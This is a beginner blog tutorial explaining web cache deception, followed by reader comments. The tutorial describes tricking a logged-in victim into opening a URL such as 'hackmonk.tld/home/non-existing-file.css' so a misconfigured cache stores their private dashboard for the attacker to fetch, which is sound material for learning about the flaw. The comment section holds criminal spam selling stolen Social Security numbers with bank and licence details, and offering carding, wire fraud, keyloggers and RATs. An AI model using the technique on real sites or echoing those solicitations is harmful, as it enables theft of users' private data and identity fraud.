Wednesday, 16 January 2019

A Noob's Guide to Web Cache Deception.

Users are often the weakest link when we are exploring for a vulnerability and 
of-course they can be easily tricked. Today in this tutorial we are going to discuss about a simple but severe bug known as Web Cache Deception. So let's begin

As the name says it all "Web Cache Deception" - something related to cache and the action of deceiving someone. Web cache deception is deceiving a victim using weakness in caching mechanisms. So, how it works? Well as a rough definition this is how it works : A caching mechanism / load balancer / web application firewall is setup so that if a page is requested then it creates a cached copy of that page and when the next time, the same page is requested, then the page will be loaded from the mechanism and not from the server. An attacker creates a malicious link ( we will talk about this further ) and the victim clicks on it. Resulting in getting sensitive data cached and the attacker can also request that page with sensitive data from the caching mechanism. Now let's break it down and understand each and everything step by step

Caching is simply storing files on a computing system. This is usully done when a file is requested frequently and to reduce load from the server.
Note : static files i.e. with extensions like .css, .txt, .img, .png, .js e.t.c are cached more often because these files doesn't contain any sensitive information.

Caching Mechanism

Malicious Link
Now let us assume that there is a web application "hackmonk.tld" and there's a caching mechanism to cache all static public files. And let us also assume that the web application has user account feature and every user, after authentication can access their dashboard via "hackmonk.tld/home"
Now what an attacker will do is modify the url to make it like "hackmonk.tld/home/non-existing-file.css" where "non-exisiting-file.css" is a non existant name with .css extension. This will be the Malicious link. But hey, won't this give a 404 not found status code? That's where we confirm that vulnerability may exist. If this url leads to hackmonk.tld/home then we can go for further testing. So now the attacker will send the url "hackmonk.tld/home/non-existing-file.css" to the victim and will make him anyhow click on the link and load it on a browser on which he is logged in on the site "hackmonk.tld". Now the victim will get to the dashboard and the caching mechanism thinking that the url "hackmonk.tld/home/non-existing-file.css" belongs to a public static file will cache the page along with the cached page of victim's dashboard and the attacker wil request the same page and it will load from the caching mechanism instead of server. BOOM private information is in your hands. Sometimes you will also be able to get CSRF Tokens which will lead to full ACCOUNT TAKEOVER. Isn't it cool?

Here is an image that demonstrate's the whole attack scenario - 

Now let's discuss it further with some questions.

Won't it ask for authentication when accessing the cached page?
No, it won't. Websites don't require authentication to access public static files.

What are the conditions for this attack to work?
Well, there should be either a caching mechanism / load balancer / WAF like akamai or cloudfront which is ofcourse not configured properly and when requesting page liks "hackmonk.tld/home/non-existing-file.css" it should give the content of "home" for the URL.

Final Words
So here we end this tutorial and i hope it explains each and everything about Web Cache Deception. Please comment down if i missed anything or if i wrote something incorrect.

Resources and Tools 
Here are some resources for further reading on the topic "Web Cache Deception"
And here is a payload list for faster testing 

Thankyou for reading guys. I will meet you next time with more informational content. BYE


  1. Hey Guys !

    USA Fresh & Verified SSN Leads with DL Number AVAILABLE with 99.9% connectivity
    All Leads have genuine & valid information

    First Name | Last Name | SSN | Dob | DL Number | Address | City | State | Zip | Phone Number | Account Number | Bank Name | Employee Details | IP Address

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If anyone buy in bulk, we can negotiate
    *Sampling is just for serious buyers

    ->$5 PER EACH

    ->Hope for the long term deal
    ->Interested buyers will be welcome

    **Contact 24/7**
    Whatsapp > +923172721122
    Email >
    Telegram > @leadsupplier
    ICQ > 752822040

  2. Hello all
    am looking few years that some guys comes into the market
    they called themselves hacker, carder or spammer they rip the
    peoples with different ways and it’s a badly impact to real hacker
    now situation is that peoples doesn’t believe that real hackers and carder scammer exists.
    Anyone want to make deal with me any type am available but first
    I‘ll show the proof that am real then make a deal like

    Available Services

    ..Wire Bank Transfer all over the world

    ..Western Union Transfer all over the world

    ..Credit Cards (USA, UK, AUS, CAN, NZ)

    ..School Grade upgrade / remove Records

    ..Spamming Tool

    ..keyloggers / rats

    ..Social Media recovery

    .. Teaching Hacking / spamming / carding (1/2 hours course)

    discount for re-seller

    Contact: 24/7